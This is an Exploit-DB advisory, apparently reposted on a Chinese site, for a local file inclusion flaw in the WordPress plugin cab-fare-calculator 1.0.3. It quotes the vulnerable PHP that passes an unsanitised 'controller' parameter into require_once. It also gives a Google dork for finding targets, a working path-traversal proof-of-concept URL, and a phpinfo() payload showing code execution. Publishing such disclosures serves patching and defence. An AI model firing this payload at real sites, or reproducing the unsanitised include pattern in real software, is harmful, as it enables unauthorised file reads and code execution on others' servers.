WordPress Plugin cab-fare-calculator 1.0.3 – Local File Inclusion - 体验盒子

作者： Hassan Khan Yusufzai

日期： 2022-03-30

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/50843/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion

# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/

# Date: 24-03-2022

# Exploit Author: Hassan Khan Yusufzai - Splint3r7

# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/

# Version: 1.0.3

# Tested on: Firefox

# Vulnerable File: tblight.php

# Impact:

Local File Read / Code Execution

# Vulnerable Code:

</code><code>

if(!empty($_GET['controller']) && !empty($_GET['action']) &&

!empty($_GET['ajax']) && $_GET['ajax'] == 1)

{

require_once('' . 'controllers/'.$_GET['controller'].'.php');

}

</code><code>

# Proof of concept:

http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:

/etc/index.php:

<?php echo "Local file read"; phpinfo(); ?>